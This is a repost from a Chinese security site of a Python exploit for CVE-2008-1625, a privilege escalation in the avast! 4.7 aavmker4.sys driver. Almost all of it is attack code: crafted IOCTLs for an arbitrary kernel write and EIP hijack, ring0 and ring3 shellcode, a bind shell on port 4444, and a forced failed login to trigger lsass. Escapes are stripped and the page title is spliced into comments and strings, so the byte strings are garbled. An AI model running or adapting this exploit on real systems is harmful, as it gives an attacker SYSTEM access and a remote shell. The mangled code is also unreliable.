【Exp】Avast! 4.7 aavmker4.sys privilege escalation

admin 2021年4月3日19:10:46评论60 views字数 8133阅读27分6秒阅读模式

#!/usr/bin/python 

# avast! 4.7 aavmker4.sys privilege escalation 

#

 

# CVE-2008-1625 

# Tested on WindXpSp2/Sp3 Dep ON 

# Matteo Memelli ryujin __A-T__ offensive-security.com 

#

 

# Spaghetti & Pwnsauce - 17/04/2010 

# Tested on WinXPSP2/SP3 english | avast! 4.7.1098.0 

from ctypes import *

import time, struct, sys, thread, os 

  

kernel32 = windll.kernel32 

Psapi    = windll.Psapi 

  

def findSysBase(drv): 

    print "(+) Retrieving %s base address..." % drv 

    ARRAY_SIZE            = 1024

    myarray               = c_ulong * ARRAY_SIZE 

    lpImageBase           = myarray() 

    cb                    = c_int(1024) 

    lpcbNeeded            = c_long() 

    drivername_size       = c_long() 

    drivername_size.value = 48

    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) 

    for baseaddy in lpImageBase: 

        drivername = c_char_p("x00"*drivername_size.value) 

        if baseaddy: 

            Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, 

                            drivername_size.value) 

            if drivername.value.lower() == drv: 

                print "(+) Address retrieved: %s" % hex(baseaddy) 

                return baseaddy 

    return None

  

def checkShell(): 

    check = "netstat -an | find "4444""

    res = os.popen(check) 

    ret = res.read() 

    res.close() 

    if ret.find("0.0.0.0:4444") != -1: 

        return True

    else: 

        return False

  

def kickLsass(): 

    time.sleep(10) 

    lsas1 = "echo hola | runas /user:administrator cmd.exe > NUL"

    lsas2 = "net use \127.0.0.1 /user:administrator test > NUL"

    nc    = "nc 127.0.0.1 4444"

    print "(!) NO BSOD? good sign :)"

    print "(*) Sleeping 60 secs before the Woshi finger hold..."

    time.sleep(60) 

    # Trying to kick ls-ass, any auth good or failed should help 

    # if this doesn't work for you try to rdp to the vuln box or 

    # logout/login from console... it's rough but should work 【Exp】Avast! 4.7 aavmker4.sys privilege escalation 

    print "(+) Trying to fail an auth to trigger syscall..."

    os.system(lsas1) 

    time.sleep(1) 

    os.system(lsas2) 

    while 1: 

        res = checkShell() 

        if res: 

            print "($) Shell is ready 0.0.0.0:4444"

            #os.system(nc) 

            #print "(-) netcat not in path but shell is open!" 

            break

        print "(*) Retrying. Sleeping 30 secs..."

        time.sleep(30) 

        print "(+) Trying to fail an auth to trigger syscall..."

        os.system(lsas1) 

        time.sleep(1) 

        os.system(lsas2) 

      

def pwnDrv(driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output, 

            out_size, dwReturn1): 

    # We trigger func pointer to control EIP 

    time.sleep(5) 

    print "(+) Owning EIP..."

    for i in range(1,3): 

        print "(+) Triggering function pointer: %d/2" % i 

        dev_ioctl = kernel32.DeviceIoControl(driver_handle2, IOCTL_EIP, stor_input, 

                            stor_size, stor_output, out_size, 

                            byref(dwReturn1), None) 

        time.sleep(0.5) 

      

if __name__ == '__main__': 

    print "(*) avast! 4.7 aavmker4.sys privilege escalation"

    print "(+) coded by Matteo Memelli aka ryujin -> at

    print "(+)

|| Spaghetti & Pwnsauce"

    print "(+) tested on WinXPSP2/SP3 DEP On 17/04/2010"

    GENERIC_READ  = 0x80000000

    GENERIC_WRITE = 0x40000000

    OPEN_EXISTING = 0x3

    CREATE_ALWAYS = 0x2

    IOCTL_STOR    = 0xb2d6001c # stores stuff to bypass checks in .data 

    IOCTL_VULN    = 0xb2d60030 # writes to arbitrary memory 

    IOCTL_EIP     = 0xb2d60020 # triggers function pointer to own EIP  

    # DosDevicesAAVMKER4 DeviceAavmKer4 

    DEVICE_NAME   = "\.AavmKer4"

    dwReturn1     = c_ulong() 

    dwReturn2     = c_ulong() 

    evil_size     = 0x878

    out_size      = 0x1024

    stor_size     = 0x418

    evil_output   = "" 

    stor_output   = "" 

    driver_name   = 'aavmker4.sys'

  

    # evil_input = 0x878 

    # Payload = 496 bytes 

    # ring0_migrate = 45 bytes || # xf0x01 bytes to copy 

    ring0_migrate = ( 

    "xfcxfaxebx24x5ex68x76x01x00x00x59x0fx32x89x86x69"

    "x00x00x00x8bxbex6dx00x00x00x89xf8x0fx30xb9xf0x01" 

    "x00x00xf3xa4xfbxf4xebxfdxe8xd7xffxffxff" ) 

      

    # ring0_msr = 117 bytes 

    ring0_msr = ( 

    "x6ax00x9cx60xe8x00x00x00x00x58x8bx98x60x00x00x00"

    "x89x5cx24x24x81xf9xdexc0xadxdex75x10x68x76x01x00"

    "x00x59x89xd8x31xd2x0fx30x31xc0xebx3ax8bx32x0fxb6"

    "x1ex66x81xfbxc3x00x75x2ex8bx98x68x00x00x00x8dx9b"

    "x75x00x00x00x89x1axb8x01x00x00x80x0fxa2x81xe2x00"

    "x00x10x00x74x11xbax00xffx3fxc0x81xc2x04x00x00x00"

    "x81x22xffxffxffx7fx61x9dxc3xffxffxffxffx00x04xdf"

    "xffx00x04xfex7f" ) 

      

    # ring3_stager = 61 bytes 

    ring3_stager = ( 

    "x60x6ax30x58x99x64x8bx18x39x53x0cx74x2ex8bx43x10"

    "x8bx40x3cx83xc0x28x8bx08x03x48x03x81xf9x6cx61x73"

    "x73x75x18xe8x0ax00x00x00xe8x10x00x00x00xe9x09x00"

    "x00x00xb9xdexc0xadxdex89xe2x0fx34x61xc3" ) 

          

    # msf payload: bindshell port 4444 318 bytes 

    ring3_shellcode = ( 

    "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"

    "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"

    "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"

    "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"

    "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"

    "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"

    "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"

    "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"

    "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"

    "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"

    "x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"

    "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"

    "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"

    "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"

    "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"

    "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"

    "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"

    "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"

    "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"

    "x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0xc3" ) 

  

    sysbase       = findSysBase(driver_name) 

    if not sysbase: 

        print "(-) Couldn't retrieve driver base address, exiting..."

        sys.exit() 

  

    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,  

                        0, None, CREATE_ALWAYS, 0, None) 

    driver_handle2 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,  

                        0, None, CREATE_ALWAYS, 0, None) 

      

    # .data memory area we write to; offset from base = 0x2e04  

    read_data_from= struct.pack('L', sysbase+0x2e04) # calculate addy in .data 

    # r0_address = noplsed address, jump 0xfa bytes ahead to avoid a corrupted nop 

    r0_address    = struct.pack('L', sysbase+0x23fa) 

    evil_input    = r0_address*2 + "x90"*0x102

    evil_input   += ring0_migrate + ring0_msr + ring3_stager + ring3_shellcode 

    evil_input   += "x41"*0x549 

    evil_input   += read_data_from + "x42x42x42x42" # bypass input checks 

    stor_input    = "x43x43x43x43" # padding 

    stor_input   += "x07xADxDExD0" # cmp dword ptr [eax], 0D0DEAD07h 

    stor_input   += "xBAxD0xBAx10" # cmp dword ptr [eax+4], 10BAD0BAh 

    stor_input   += "x44x44x44x44"*2

    # After arbitrary write to memory nt!KeSetEvent is called: we need to fix 

    # nt!KeSetEvent+0x32 using any addy  pointing  to value different to 0x01 

    # so we can use our "read_data_from" again. 

    stor_input   += read_data_from  

    stor_input   += "x44x44x44x44"

    # 0x2300 offset from base: we write here to control a function pointer 

    # and own EIP 

    stor_input   += struct.pack('L', sysbase+0x2300) + "x45"*414

  

    # trigger these later on... 

    thread.start_new(pwnDrv, (driver_handle2, IOCTL_EIP, stor_input, stor_size, 

                    stor_output, out_size, dwReturn1)) 

    thread.start_new(kickLsass, ()) 

    ########################################################################### 

  

    # And now let's own the boy: 

    if driver_handle1: 

        # We store values to overcome input checks 

        print "(+) Storing our precious in kernel space 【Exp】Avast! 4.7 aavmker4.sys privilege escalation ..."

        dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_STOR, stor_input,  

                            stor_size, stor_output, out_size, 

                            byref(dwReturn1), None) 

        # We trigger arbitrary write 

        print "(*) Sending evil IOCTL..."

        print "(+) Pwnage in progress...."

        dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_VULN,  

                            evil_input, evil_size, evil_output, 

                            evil_size,  

                            byref(dwReturn2), None)

文章来源于lcx.cc:【Exp】Avast! 4.7 aavmker4.sys privilege escalation

相关推荐: 【PHP】PHP 客户端浏览器页面跳转,网页重定向

    PHP 客户端浏览器页面跳转,网页重定向,PHP 客户端浏览器页面跳转,PHP 客户端页面跳转,PHP 浏览器页面跳转,PHP 网页重定向,PHP 网址重定向,PHP 网站重定向,PHP URL重定向,PHP 页面跳转,PHP 网页跳转,PHP 网址跳…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:10:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Exp】Avast! 4.7 aavmker4.sys privilege escalationhttp://cn-sec.com/archives/320105.html

发表评论

匿名网友 填写信息